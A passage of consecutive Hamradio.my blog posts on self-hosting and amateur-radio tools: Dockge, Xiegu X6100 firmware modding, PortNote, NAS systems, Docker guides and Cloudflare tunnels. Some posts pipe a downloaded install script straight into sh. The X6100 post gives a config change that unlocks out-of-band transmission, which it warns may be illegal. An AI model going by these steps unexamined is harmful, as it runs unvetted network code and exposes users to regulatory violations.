Visit https://github.com/sdr-enthusiasts/docker-acarshub

The post A Look into ACARS Hub and How to Set It Up on Your SDR System appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

Developed by Louis Lam, the creator of Uptime Kuma, Dockge is a sleek, self-hosted solution for managing your docker-compose.yaml files in a user-friendly, modern web UI—directly from your own infrastructure.

What Is Dockge?

Dockge is a Docker Compose manager that acts as a control center for all your containerized applications. Unlike heavyweight orchestration platforms like Portainer or Rancher, Dockge doesn’t abstract away your Compose files—instead, it embraces them.

It runs in your browser, provides a beautiful and responsive interface, and gives you full control over managing, editing, and deploying Docker Compose stacks.

If you’ve been manually juggling docker-compose up, down, logs, and pull across multiple folders and terminals, Dockge will feel like a leap into the future.

Core Features That Make Dockge Shine

File-Centric Management

Dockge doesn’t lock you into a database or an internal config. Your compose.yaml files live on disk, exactly where you put them. Want to edit them outside Dockge? Go ahead. Dockge simply reflects and operates on your actual file structure.

Clean, Reactive UI

Built with modern web technologies (likely Vue/React), Dockge’s interface is snappy and beautiful. Navigating your projects, spinning containers up and down, and checking logs feels almost instantaneous.

Built-in YAML Editor

No need to SSH in or fumble through nano. Dockge provides an in-browser YAML editor with syntax highlighting, so you can tweak your Compose files in real-time, from any device.

Manage Container Lifecycle

With just a few clicks, you can:

• Start or stop containers
• Restart entire stacks
• Pull new images
• View live logs
• See environment variables

Multiple Project Support

Dockge supports multiple projects, each represented as a folder containing a Compose file. Think of it as a workspace manager—ideal for homelabbers running various self-hosted services like Home Assistant, Nextcloud, Pi-hole, Jellyfin, etc.

Web Terminal

Need to run a one-off command inside a container? The integrated web terminal gives you shell access right in the browser, without needing to docker exec manually.

Convert Docker Run to Compose

This underrated feature lets you paste a docker run command and convert it into a docker-compose.yaml file. It’s a brilliant way to transition your one-off containers to managed stacks.

Who Is Dockge For?

Dockge is tailor-made for:

• Developers who want more control over containerized environments.
• Self-hosting enthusiasts looking for clean, no-nonsense management of their homelab apps.
• Tech-savvy hobbyists who don’t want to learn Kubernetes or manage overkill dashboards.
• Minimalists who believe that good tools should be powerful and elegant.

Getting Started with Dockge

Setting up Dockge is incredibly simple—if you already use Docker Compose, you’re halfway there. Here’s a high-level overview:

1. Clone the Repository

git clone https://github.com/louislam/dockge /opt/dockge

2. Move Into the Directory

cd /opt/dockge

3. Start the Service

docker compose up -d

By default, Dockge runs a web server where you can start managing your Compose projects immediately. It reads your existing file structure, meaning there’s no database to configure and no vendor lock-in.

4. Optional: Add Auth and SSL

You can easily integrate it behind a reverse proxy with basic auth or OAuth (via Nginx, Traefik, etc.) to keep your setup secure.

Community & Support

Dockge is a growing open-source project with an active and supportive community. Here’s how to get involved:

• Join GitHub Discussions
• Report bugs and suggest features via GitHub Issues
• Contribute code or docs to help the project grow

Louis Lam has a reputation for responsiveness and quality (just look at Uptime Kuma’s success), so Dockge is in good hands.

Dockge vs Alternatives

Feature	Dockge	Portainer	Yacht
Compose-first design	Yes	No (UI-driven)	Yes
File-based	Yes	No	Yes
Lightweight UI	Blazing fast	Heavy	Moderate
Conversion Tools	docker run → compose	No	No
Terminal Access	Built-in		No
Multi-project	Excellent

Final Thoughts: Should You Use Dockge?

Absolutely—especially if you value clean interfaces and control.

Dockge bridges the gap between command-line flexibility and modern user interfaces. It’s the perfect tool for self-hosters and developers who want a non-intrusive, elegant, and functional way to manage Docker Compose environments.

Whether you’re managing a fleet of Raspberry Pis, running a mini data center at home, or just hosting your personal blog and media server, Dockge will make your life easier.

Explore More

GitHub: https://github.com/louislam/dockge

Try it, star it, and join the conversation. Your containers will thank you.

The post Dockge: The Ultimate Docker Compose Manager for Modern Self-Hosters appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

If you’re running a Xiegu X6100 and find yourself itching to explore what lies beneath its firmware, you’re not alone. But cracking it open safely and consistently? That’s where x6100-fw-mangler by @j0ju shines.

This project makes customizing and experimenting with X6100 firmware reproducible, debuggable, and way less painful—whether you’re tweaking system internals, creating multiboot images, or just injecting some extra userland tools.

Why This Project Exists

Because modding your radio should be fun, not a guessing game.

The X6100 is a fantastic device for amateur radio operators—but modding it has traditionally been tricky. The x6100-fw-mangler was built to:

• Simplify custom firmware builds
• Enable modifications without risking a brick
• Make the process transparent, reversible, and Dockerized

It’s a tool not just for flashing, but for learning, poking, and understanding how the X6100 boots and behaves.

What It Does

• Generates bootable SD card or eMMC update images
• Applies modifications to firmware safely inside a container
• Adds Alpine Linux userland tools to enhance functionality
• Builds multiboot setups (Xiegu stock + R1CBU open firmware)
• Supports original and open-source firmware (R1CBU)

You’ll be able to fully customize the system image and boot your X6100 from SD or flash it to internal storage.

Key Features

• Docker-powered, no need to pollute your host with toolchains.
• Uses qemu-user-static to emulate ARM and modify firmware even on x86.
• Custom SD card images with:
  • Alpine utilities
  • Bluetooth pairing scripts
  • Shell and serial tweaks
  • Automount disabled
  • GUI recoloring (cyan instead of red)

Supported Image Types

Hold the left-most button during boot to switch to the R1CBU firmware.

Example Commands

make xiegu-v1.1.7-modded.sdcard.img
make r1cbu-v0.17.1-modded.update.img
make multiboot-modded.sdcard.img

Need to unpack a random unknown .img file?

cp my-image.img unknown-beauty.img
make unknown-beauty.tar

This gives you a .tar archive of the image content for analysis.

How It Works (Under the Hood)

1. A Docker image called x6100:img-mangler is built with required tools.
2. .url files download official firmware (stock or R1CBU).
3. Firmware images are unpacked into /target.
4. Mods are applied (via Docker layers).
5. New .sdcard.img or .update.img files are output.

Linux users with binfmt_misc can chroot into the ARM image using QEMU—no real device needed.

WiFi + Console Tips

To connect to WiFi from serial console:

nmcli device wifi connect YOUR_SSID password YOUR_PASS

If you’re having issues with WPA3:

nmcli conn down YOUR_SSID
nmcli conn edit YOUR_SSID << EOF
  set wifi-sec.key-mgmt wpa-psk
EOF
nmcli conn up YOUR_SSID

Frequency Extension (TX Unlock / MARS Mod)

Want to transmit outside official HAM bands? Be warned—it’s your responsibility.

In firmware 1.1.7, edit:

/etc/xgradio/xgradio.conf

and change to fullband-tx=enable

Then restart the radio. You now TX on all supported frequencies. But this might violate local laws and could damage the hardware’s filtering. Proceed wisely.

Boot Process Summary

• Device starts with BROM
• Checks SD card → eMMC for EGON signature
• Loads U-Boot, reads MBR, looks for uboot.scr
• uboot.scr boots the kernel
• Environment var devnum:
  • 0 = booted from SD
  • 1 = booted from eMMC

The official u-boot-sunxi-with-spl.bin is used for boot sectors.

Credits

This entire toolchain was created and maintained by @j0ju.
Massive respect for building a clean, reproducible, and open solution for the Xiegu X6100 firmware community.

GitHub: github.com/j0ju/x6100-fw-mangler

The post X6100 Firmware Mangler: The Way to Hack and Tinker Your Xiegu X6100 (MARS mod) appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

This is where PortNote comes in — a minimal, beautiful, and self-hosted tool to help you track and document all your used ports in one glance.

Whether you’re running dozens of Docker containers, VMs, or bare-metal services, PortNote is a must-have for keeping your infrastructure tidy and your sanity intact.

What is PortNote?

PortNote is a web-based app designed to let you quickly and visually document port usages. Think of it as a personal notepad or dashboard specifically built for network and application ports.

It’s completely self-hosted, requires no external services, and offers a beautiful interface for you to:

• Track which services use which ports
• Add meaningful descriptions and links
• Group entries by server or IP
• Avoid port conflicts
• Stay organized, especially in a growing homelab or VPS setup

PortNote is perfect for:

• Homelab enthusiasts
• Sysadmins managing multiple services
• Developers juggling local development ports
• Anyone using Docker, Proxmox, or VMs

Key Features

• Visual port mapping: Clean, card-style display of services and ports
• Notes and descriptions: Add context to each port so you never forget
• Clickable links: Link to service dashboards or local UIs
• Group by server/IP: Useful when managing multiple machines
• Lightweight & fast: No database, runs entirely in your browser
• Simple JSON backend: Data is stored in a local db.json file
• Docker-ready: Just one container to deploy

How to Deploy PortNote (Docker)

Getting PortNote running is super simple. Here’s a quick guide to deploy it using Docker:

Step 1: Clone the Repository

git clone https://github.com/crocofied/PortNote.git
cd PortNote

Step 2: Launch with Docker

docker compose up -d

That’s it!

By default, PortNote runs on port 5173. Open your browser and head to:

http://localhost:5173

You’ll be greeted with a clean and modern interface where you can begin adding your services and their associated ports.

Data Storage

PortNote stores your port notes in a local file called db.json.

By default, this file is mounted into the container to persist your data:

volumes:
  - ./db.json:/app/db.json

You can easily back it up, version it with Git, or sync it across devices if needed. It’s that simple.

How to Use PortNote

Once you’re inside the web UI, you’ll see a form to add a new port entry. Here’s how you might use it:

Click Add, and the port is logged and visually displayed on your dashboard.

You can edit or delete entries anytime — it’s designed to be fast and intuitive.

Demo

Want to try before hosting?

A live demo is available at:
https://portnote-demo.netlify.app

Note: The demo does not save your data between sessions.

Privacy and Simplicity

PortNote doesn’t phone home. It’s a fully static app with no telemetry, no analytics, and no dependencies beyond your browser and the JSON file. It’s perfect for privacy-focused users.

In fact, if you’d prefer to run it without Docker, you can even build and serve it statically via NGINX, Caddy, or any file server.

Advanced Deployment (Static Hosting)

Want to host PortNote without Docker? You can!

Build it manually:

npm install
npm run build

Then copy the contents of the dist/ directory to any web server of your choice — it’s just HTML, CSS, and JS.

You’ll also need to configure access to db.json or wire it up to a backend of your choice (e.g., Firebase, Supabase, etc.) if you want something more advanced.

Why PortNote is Useful

In a world where we’re running Grafana on :3000, Portainer on :9000, Prometheus on :9090, your blog on :4000, and who knows what else — it’s easy to forget.

PortNote gives you a single place to document everything and avoid confusion or port conflicts.

It also becomes handy when you revisit your homelab setup after a few weeks (or months) and don’t want to reverse-engineer every docker-compose.yml.

Final Thoughts

PortNote is one of those tools that’s small, but incredibly effective. If you maintain any sort of local or cloud infrastructure, this is a fantastic addition to your toolbox.

No overhead, no login systems, no complex config. Just a clean interface to help you stay organized.

Official GitHub:
https://github.com/crocofied/PortNote

Created by: @crocofied

The post PortNote – A Beautiful and Simple Way to Document Your Network Ports appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

In this post, we’ll explore the top 5 open-source NAS operating systems you can deploy today. Each one is suited to different needs—ranging from powerful enterprise-level setups to simple plug-and-play solutions for beginners.

1. TrueNAS CORE (formerly FreeNAS) – The ZFS King

Base OS: FreeBSD
Filesystem: ZFS
Best for: Power users, enterprises, and anyone who values data integrity

Why TrueNAS CORE?

TrueNAS CORE is the gold standard in open-source NAS software. Built on FreeBSD and leveraging the incredibly robust ZFS file system, it offers data protection features like checksumming, copy-on-write, and built-in snapshots.

It comes with a polished web UI, plugin support (e.g., Nextcloud, Plex, Transmission), replication tools, encryption, and advanced networking. It even supports virtual machines and Docker via its Linux counterpart, TrueNAS SCALE.

Recommended if you have 8GB+ RAM, preferably ECC, and want bulletproof storage with enterprise-level features.

https://www.truenas.com/truenas-core/

2. OpenMediaVault (OMV) – Best for Simplicity and Home Use

Base OS: Debian Linux
Filesystem: ext4, XFS, Btrfs, ZFS (via plugin)
Best for: Home servers, Raspberry Pi NAS builds, beginners

Why OpenMediaVault?

If you’re looking for something lightweight and easy to manage, OMV is your go-to. It’s perfect for home users or beginners wanting to set up a file server, media server, or even a Time Machine backup destination.

With Docker and Portainer integration, you can run containers effortlessly. It also has a large ecosystem of plugins and excellent community support.

Ideal for Raspberry Pi, mini PCs, or old laptops converted into a NAS.

https://www.openmediavault.org/

3. Rockstor – Linux-Based NAS with Btrfs Power

Base OS: openSUSE (newer versions)
Filesystem: Btrfs
Best for: Developers, Docker fans, modern Linux users

Why Rockstor?

Rockstor is a lesser-known but powerful NAS option that revolves around Btrfs, a modern copy-on-write file system with snapshot and compression capabilities. It features a clean web UI, Docker support, and great storage management features.

If you’re into Linux and want an alternative to ZFS, Rockstor’s Btrfs-first approach is worth trying.

Perfect for DIYers and devs looking to experiment with containers and Btrfs.

https://rockstor.com/

4. XigmaNAS (formerly NAS4Free) – Lightweight BSD NAS

Base OS: FreeBSD
Filesystem: ZFS, UFS
Best for: Legacy hardware, users who want a BSD NAS without bloat

Why XigmaNAS?

Think of XigmaNAS as the simpler cousin of TrueNAS. It’s BSD-based, supports ZFS, and runs well on older hardware. The UI is not as polished, but it gets the job done.

It supports all major sharing protocols (SMB, NFS, AFP, FTP, etc.) and can be configured for RAID, iSCSI, and rsync easily.

Great for repurposing older PCs into reliable NAS boxes.

https://www.xigmanas.com/

5. EasyNAS – Minimalist and Straightforward

Base OS: openSUSE
Filesystem: Btrfs
Best for: Total beginners, plug-and-play NAS setups

Why EasyNAS?

True to its name, EasyNAS is built for simplicity. It’s lightweight, quick to install, and has a minimal interface that lets you set up your file server in minutes. It lacks advanced features, but for basic use—like backing up files or sharing over the network—it’s more than capable.

Best if you want a “set it and forget it” NAS with minimal learning curve.

https://easynas.org/

Comparison at a Glance

Final Thoughts: Which NAS Should You Choose?

• Choose TrueNAS CORE if you want maximum reliability with ZFS, advanced features, and don’t mind the extra learning curve.
• Choose OpenMediaVault for ease of use, Raspberry Pi support, and excellent Docker integration.
• Choose Rockstor if you prefer Linux and want to explore Btrfs with Docker.
• Choose XigmaNAS for a light BSD-based NAS on old or underpowered hardware.
• Choose EasyNAS if you want a quick and easy local file server without the fluff.

Have questions or need help choosing the right NAS for your setup? Feel free to reach out or drop a comment below. Whether you’re running this on a recycled PC or a Raspberry Pi, there’s never been a better time to go open-source with your storage.

The post The Best Open Source NAS Operating Systems appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

Why Docker?

Docker allows you to deploy software in isolated containers, complete with all their dependencies. This means you don’t need to worry about library conflicts, system packages, or compiling from source—just pull the image and run.

The Docker images provided by jketterl on Docker Hub are built specifically for OpenWebRX and include all necessary requirements out of the box. Images are available for a range of hardware types, and there’s even a comprehensive “full” variant that supports multiple SDR devices.

These images are built for multiple architectures:

• x86_64 (most desktops/laptops)
• armv7l and aarch64 (perfect for Raspberry Pi and similar single-board computers)

Quick Start for Raspberry Pi

If you haven’t installed Docker yet, the easiest way is to run:

curl -sSL https://get.docker.com | sh

Once Docker is installed, you’re just two commands away from getting OpenWebRX up and running:

docker volume create openwebrx-settings
docker run --device /dev/bus/usb -p 8073:8073 \
  -v openwebrx-settings:/var/lib/openwebrx \
  --tmpfs=/tmp/openwebrx \
  jketterl/openwebrx:stable

This setup does the following:

• Maps USB access so your SDR hardware can be used inside the container
• Creates a persistent volume for OpenWebRX settings
• Offloads temporary files to memory (tmpfs) to reduce SD card wear, which is especially important on Raspberry Pi

Docker Compose Option

If you prefer docker-compose, here’s a minimal docker-compose.yml setup:

version: "3"
services:
  openwebrx:
    image: jketterl/openwebrx:stable
    volumes:
      - ./openwebrx/settings:/var/lib/openwebrx
    ports:
      - "8073:8073"
    devices:
      - "/dev/bus/usb/002/002:/dev/bus/usb/002/002"
    tmpfs:
      - "/tmp/openwebrx"

Make sure to adjust the USB device path according to your system. You can check your SDR device’s path using lsusb and ls /dev/bus/usb.

Troubleshooting: USB Device Access

Some users run into issues when the SDR device cannot be accessed inside the Docker container. This usually shows up as an error like:

usb_claim_interface error -6

This happens when the Linux kernel loads its own drivers for your SDR, preventing access from within Docker.

To solve this, you’ll need to blacklist the appropriate kernel modules on your host system. Here’s a quick reference:

On Debian-based systems:

Create a file in /etc/modprobe.d/, such as sdr-blacklist.conf, and add lines like:

blacklist dvb_usb_rtl28xxu

After that, run sudo update-initramfs -u and reboot your system to apply the changes.

Final Notes

This containerized approach to running OpenWebRX is efficient, maintainable, and easy to back up or migrate. It’s ideal for both newcomers and experienced users alike. The Docker images by jketterl are actively maintained and support a variety of SDR hardware, making them a solid choice for any SDR setup.

If you’re looking to get your SDR receiver online with minimal configuration and maximum flexibility, this is the way to go. Visit https://github.com/jketterl/openwebrx

The post OpenWebRX Using Docker on Raspberry Pi and Other Devices appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

Amateur radio operators often use various software for digital modes, packet radio, SDR, logging, and hotspot management. Docker containers make installing and running these apps easier and more consistent, regardless of your OS or environment.

Below is a curated list of top amateur radio software that either has official or community Docker images available — plus example commands so you can start using them immediately.

1. Dire Wolf – Soundcard AX.25 Packet TNC & APRS

Purpose: Software TNC for packet radio and APRS with soundcard interface.

Docker image: w6rz/direwolf

Run command example:

docker pull w6rz/direwolf

docker run -it --rm \
  --device /dev/snd \
  --device /dev/ttyUSB0 \
  -v $HOME/direwolf:/root \
  w6rz/direwolf

• Mounts your local config directory.
• Accesses sound and radio devices.
• Configure direwolf.conf inside your $HOME/direwolf folder.

2. OpenWebRX – Web-Based SDR Receiver

Purpose: Run a remote software-defined radio (SDR) accessible via web browser.

Docker image: cyoung/openwebrx

Run command example:

docker pull cyoung/openwebrx

docker run -d -p 8073:8073 cyoung/openwebrx

• Access the SDR web interface at http://localhost:8073
• Connect and listen from anywhere on your network.

3. WSJT-X – FT8 and Other Weak Signal Digital Modes

Purpose: Decode weak digital signals like FT8, JT65.

Docker image: No official image, but community versions exist (e.g., jks-prv/wsjtx).

Run command example:

docker pull jks-prv/wsjtx

docker run -d -p 5900:5900 jks-prv/wsjtx

• Runs a VNC server on port 5900 to access the GUI.
• Connect using a VNC client to localhost:5900.

4. Fldigi – Multi-Mode Digital Modem

Purpose: Supports many digital modes: PSK31, RTTY, MFSK, Olivia, and more.

Docker image: Community-built images exist (e.g., ka6sox/fldigi).

Run command example with X11 forwarding (Linux):

xhost +local:docker

docker run -it --rm \
  -e DISPLAY=$DISPLAY \
  -v /tmp/.X11-unix:/tmp/.X11-unix \
  --device /dev/snd \
  ka6sox/fldigi

• Access GUI directly on your desktop.
• Use sound devices for digital mode decoding.

5. Pi-Star – Digital Voice Hotspot Software (DMR, YSF, P25)

Purpose: Popular for managing digital voice hotspots.

Docker image: Community image (e.g., wm5d/pi-star).

Run command example:

docker pull wm5d/pi-star

docker run -d -p 80:80 -p 22222:22222 wm5d/pi-star

• Access the Pi-Star dashboard via http://localhost
• Configure your digital voice hotspot remotely.

6. Chirp – Radio Programming Software

Purpose: Program handheld radios easily.

Docker image: Community images available.

Run command example with GUI (X11 forwarding):

xhost +local:docker

docker run -it --rm \
  -e DISPLAY=$DISPLAY \
  -v /tmp/.X11-unix:/tmp/.X11-unix \
  yourusername/chirp

Bonus: Managing Multiple Ham Radio Containers with Docker Compose

Create a docker-compose.yml file to run multiple services together (e.g., Dire Wolf and OpenWebRX):

version: '3'
services:
  direwolf:
    image: w6rz/direwolf
    devices:
      - /dev/snd
      - /dev/ttyUSB0
    volumes:
      - ./direwolf:/root
    stdin_open: true
    tty: true

  openwebrx:
    image: cyoung/openwebrx
    ports:
      - "8073:8073"

Run all at once:

docker-compose up

Summary Table of Top Ham Radio Docker Containers

Final Thoughts

Running amateur radio software inside Docker containers lets you:

• Avoid complicated installations.
• Run your apps anywhere without changes.
• Experiment with new software without risk.
• Easily manage dependencies and updates.

The post Top Amateur Radio Software You Can Run Using Docker: Practical Examples appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

In the landscape of modern software development and IT operations, Docker has emerged as a game-changer. Whether you’re a developer, system administrator, or a DevOps engineer, Docker empowers you to build, ship, and run applications seamlessly — across your laptop, on-premise servers, or the cloud. This blog post will dive deep into Docker’s origin, its practical uses, key commands you need to know, advantages, and provide a hands-on example to get you started.

The Origin and History of Docker

Docker’s roots trace back to 2010 when a company named dotCloud, a platform-as-a-service (PaaS) provider, started experimenting with Linux container technology to better isolate and manage applications.

• March 2013: Docker was launched as an open-source project by Solomon Hykes, the CTO of dotCloud.
• Why it stood out: Docker made Linux containers accessible to developers through simple commands, standard image formats, and tooling that abstracted away complex underlying tech like LXC, cgroups, and namespaces.
• Growth: Docker quickly captured the attention of the tech community and companies worldwide. It transformed from an internal tool to the foundation of a whole ecosystem involving container registries (Docker Hub), orchestration tools (Docker Swarm, Kubernetes), and developer workflows.

Today, Docker Inc. continues to innovate with products designed for enterprise container management, security, and cloud-native development.

What Is Docker and Why Should You Care?

At its core, Docker is a containerization platform that packages your application and all its dependencies — libraries, system tools, and settings — into a single container. This container can run consistently across any environment that supports Docker, eliminating the infamous “it works on my machine” problem.

Why containers?

Before containers, virtualization was the go-to method to isolate applications — think Virtual Machines (VMs). But VMs require a full guest OS, which consumes more disk space, memory, and CPU.

Containers are lightweight:

• Share the host OS kernel.
• Start almost instantly.
• Require less storage.

Use cases for Docker include:

• Development environment standardization: Developers can replicate production environments on local machines.
• Microservices deployment: Each service runs in its own container, independently scalable and maintainable.
• CI/CD pipelines: Automate builds and tests in isolated containers.
• Legacy app modernization: Containerize old apps to run on modern infrastructure.
• Cloud migration: Easily move workloads across public clouds or hybrid setups.

Essential Docker Commands You Must Know

Here’s a handy list of Docker commands that cover basic to intermediate tasks:

Advantages of Using Docker

1. Portability and Consistency

Docker containers encapsulate everything needed to run your app, ensuring consistent behavior across development, staging, and production — regardless of where the container runs.

2. Lightweight

Containers share the OS kernel and don’t require running a full guest OS, saving CPU, memory, and storage compared to VMs.

3. Faster Deployment

Containers start almost instantly (in seconds), accelerating development cycles and scaling capabilities.

4. Isolation and Security

Containers provide process-level isolation, which helps prevent conflicts between apps running on the same host.

5. Simplified Dependency Management

No need to install or configure software dependencies on your host; they’re baked into the container image.

6. Vibrant Ecosystem

With Docker Hub, users have access to thousands of ready-to-use container images. The active community continually develops tools and resources.

7. Improved Resource Utilization

Multiple containers can run efficiently on a single host, making better use of hardware resources.

A Simple Docker Example: Running a Hello World Web Server

Let’s walk through a practical example so you can experience Docker firsthand.

Step 1: Install Docker

Make sure Docker is installed on your system. You can find official installation guides on docker.com.

Step 2: Run a prebuilt web server container

Open your terminal and run:

docker run -d -p 8080:80 --name hello-web nginx

What this does:

• docker run — Run a container.
• -d — Detached mode (runs container in the background).
• -p 8080:80 — Map port 8080 on your host to port 80 in the container.
• --name hello-web — Assign a name to the container.
• nginx — Use the official nginx web server image from Docker Hub.

Step 3: Access your web server

Open your browser and navigate to http://localhost:8080. You should see the default Nginx welcome page, meaning your container is up and running.

Step 4: Inspect the container

Check running containers:

docker ps

View container logs:

docker logs hello-web

Access the container shell:

docker exec -it hello-web /bin/bash

Inside, you can browse files, for example:

cat /usr/share/nginx/html/index.html

Step 5: Stop and remove the container

To stop:

docker stop hello-web

To remove:

docker rm hello-web

Conclusion

Docker has revolutionized software development and IT operations by making container technology accessible, portable, and scalable. It simplifies dependency management, accelerates deployment, and ensures your applications behave the same everywhere — a crucial advantage in today’s fast-moving development world.

This example only scratches the surface of Docker’s power. From building your own container images to orchestrating complex multi-container applications with Docker Compose or Kubernetes, Docker opens up a world of possibilities.

If you want to master modern software workflows, learning Docker is a must.

The post Docker: The Container Revolution That Changed Software Development Forever appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

Docker has become the de facto standard for containerization on Linux systems. It provides developers with an easy and reproducible way to deploy applications. But if you’re a FreeBSD user like me, you’ve probably discovered that Docker isn’t natively supported. That’s because Docker relies heavily on Linux kernel features such as cgroups, namespaces, and UnionFS, which FreeBSD does not support directly.

So, what are our options? Can we still run containers on FreeBSD, or even Docker itself? The answer is yes—with some workarounds and native alternatives.

In this blog post, we will walk you through several approaches:

Why Docker Doesn’t Run Natively on FreeBSD

Docker was built specifically for the Linux kernel. It depends on:

• Linux control groups (cgroups)
• Namespaces
• AUFS/OverlayFS
• A running Docker daemon

FreeBSD uses different mechanisms, such as jails and ZFS. Because of this incompatibility, Docker can’t run on FreeBSD without a Linux layer. However, that doesn’t mean you’re out of luck.

Option 1: Use Podman – A Docker-Compatible Alternative

Podman is a daemonless container engine that offers a command-line interface similar to Docker. It’s available in FreeBSD’s package repository and works quite well for many use cases.

Installing Podman on FreeBSD

pkg install podman

Start the Podman service:

service podman start

Now you can use it just like Docker:

podman pull alpine
podman run -it alpine sh

Podman runs rootless containers, which means better security, but some Docker features like Docker Compose or privileged containers might not be fully supported.

Option 2: Run Docker Inside a Linux VM

If you absolutely need full Docker functionality, the best solution is to run Docker inside a virtual machine. You can do this using FreeBSD’s native hypervisor bhyve, or with VirtualBox.

A. Using bhyve and vm-bhyve

1. Install the required packages:

pkg install vm-bhyve grub2-bhyve

2. Initialize the environment:

zfs create -o mountpoint=/vm zroot/vm
vm init
vm switch create public

3. Download a Linux ISO (e.g., Ubuntu), and create the VM:

vm iso https://releases.ubuntu.com/22.04/ubuntu-22.04-live-server-amd64.iso
vm create ubuntuvm
vm install ubuntuvm ubuntu-22.04-live-server-amd64.iso

4. After installing Ubuntu, log into the VM and install Docker:

curl -fsSL https://get.docker.com -o get-docker.sh
sh get-docker.sh

Now you have a full Linux environment running Docker within FreeBSD.

B. Using VirtualBox

If you prefer a GUI solution, VirtualBox works well on FreeBSD:

pkg install virtualbox-ose

After installation, create a Linux virtual machine (e.g., Ubuntu, Alpine), then install Docker inside it as shown above.

Option 3: Use FreeBSD Jails with BastilleBSD

FreeBSD has its own native containerization technology: jails. They are extremely lightweight and secure. You can manage jails easily with a tool like BastilleBSD.

Installing BastilleBSD

pkg install bastille
sysrc bastille_enable=YES
service bastille start

Bootstrap a FreeBSD Release

bastille bootstrap 13.2-RELEASE

Create and Start a Jail

bastille create myjail 13.2-RELEASE 10.0.0.10
bastille start myjail
bastille console myjail

Now you’re inside a FreeBSD jail where you can run isolated applications.

While this isn’t Docker-compatible, it’s extremely efficient and secure for server deployments.

Summary Table

Method	Docker-Compatible	FreeBSD Native	Ideal Use Case
Podman	Partial	Yes	Development, rootless containers
Linux VM (bhyve)	Full	No	Full Docker support, CI/CD setups
VirtualBox	Full	No	Desktop Docker environment
BastilleBSD	No	Yes	Secure, lightweight FreeBSD jails

Final Thoughts

While Docker doesn’t run natively on FreeBSD, you still have powerful and flexible options depending on your use case:

• Want to run containers like Docker? Try Podman.
• Need full Docker functionality? Use a Linux VM with bhyve or VirtualBox.
• Want lightweight, secure FreeBSD-native containers? Go with jails and BastilleBSD.

Each method has its strengths and trade-offs.

The post How to Use Docker on FreeBSD (and the Best Alternatives) appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

This guide shows you how to safely publish your internal website using Cloudflare Tunnel, hosted directly on your MikroTik router via Docker.

Scenario

Your router will run the Cloudflare Tunnel and forward requests securely to your internal PC running the web server.

Prerequisites

• MikroTik router with Docker support (e.g. RB5009, CCR2004, CHR)
• RouterOS 7.5+
• USB flash drive plugged into MikroTik (for container storage)
• Web server running at 192.168.0.10:80
• A Cloudflare account with your domain added (e.g. domain.com)

Step 1: Enable Docker on MikroTik

1. Install the container package:
   Get it from mikrotik.com/download under RouterOS v7 > Extra packages.
2. Reboot after installation.
3. Set Docker storage: /container config set root-dir=disk1/docker
4. Enable Docker: /container set enabled=yes

Step 2: Create Tunnel (on any PC)

Only needed once — you can delete the PC tunnel afterward.

1. Install Cloudflared: sudo apt install cloudflared
2. Authenticate: cloudflared tunnel login This opens a browser window. Log in and choose your domain.
3. Create a tunnel: cloudflared tunnel create webserver-tunnel This generates a .json credential file.
4. Create config file config.yml: tunnel: webserver-tunnel credentials-file: /cloudflared/webserver-tunnel.json ingress: - hostname: webserver.domain.com service: http://192.168.0.10:80 - service: http_status:404

Step 3: Transfer Files to MikroTik

Copy the following files to your MikroTik into /disk1/cloudflared/:

• webserver-tunnel.json
• config.yml

Use SCP or drag & drop via Winbox → Files.

Step 4: Run Cloudflared Docker Container on MikroTik

1. Add the container: /container add \ remote-image=cloudflare/cloudflared:latest \ name=cloudflared \ root-dir=disk1/cloudflared \ command="tunnel --config /etc/config.yml run"
2. Start it: /container start cloudflared

Step 5: Configure Cloudflare Dashboard (Zero Trust)

Now go to https://one.cloudflare.com and:

1. Navigate to Access → Tunnels.
2. Click your tunnel (webserver-tunnel).
3. Click “Add a public hostname”.
4. Fill in:
   • Subdomain: webserver
   • Domain: domain.com
   • Service: http://192.168.0.10:80
5. Click Save.

Now Cloudflare knows where to route incoming requests.

Done! Test It

Visit:

https://webserver.domain.com

Your site should load — even if you’re on mobile or outside your home network. All traffic is encrypted and proxied via Cloudflare, without any port forwarding.

Optional: Add Zero Trust Access Policy

Want to protect the site with a login?

1. In Cloudflare dashboard, go to:
   Access → Applications → Add Application
2. Choose Self-hosted.
3. Fill in:
   • App name: Web Server
   • URL: https://webserver.domain.com
4. Set who can access (e.g. emails, GitHub, etc.)

Now only authorized users can access your internal site.

Summary

Feature	Status
No port forwarding
Works behind NAT
Runs on MikroTik
Secure Cloudflare Tunnel
Access via domain

You’ve now turned your MikroTik router into a secure gateway for publishing internal services to the internet — the Cloudflare way.

The post Hosting a Web Server Securely with Cloudflare Zero Trust Tunnel on MikroTik (Using Docker) appeared on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

Self-hosting applications has become increasingly popular among developers, tech enthusiasts, and homelabbers. However, securely exposing internal services to the internet is often a complicated task. It involves:

• Opening firewall ports
• Dealing with dynamic IPs
• Managing TLS certificates
• Handling reverse proxies
• Setting up access control

This is where DockFlare comes in.

DockFlare is a lightweight, self-hosted Cloudflare Tunnel automation tool for Docker users. It simplifies the process of publishing your internal Docker services to the public internet through Cloudflare Tunnels, while providing optional Zero Trust security, DNS record automation, and a sleek web interface for real-time management.

Objectives of DockFlare

DockFlare was created to solve three key problems:

1. Simplicity: Configure secure public access to your Docker containers using just labels—no reverse proxy, SSL setup, or manual DNS records needed.
2. Security: Protect your services behind Cloudflare’s Zero Trust Access, supporting identity-based authentication (Google, GitHub, OTP, and more).
3. Automation: Automatically create tunnels, subdomains, and security policies based on your Docker service metadata. No scripting. No re-deploys.

Why Use DockFlare?

Here’s how DockFlare benefits its users:

• Quick Setup: Set up secure tunnels and expose services in seconds with Docker labels.
• Zero Trust Security: Enforce authentication for any service using Cloudflare Access.
• No Public IP Required: No need to forward ports or expose your home IP—perfect for CG-NAT and mobile ISPs.
• Safe by Default: TLS encryption, no open ports, and access rules built-in.
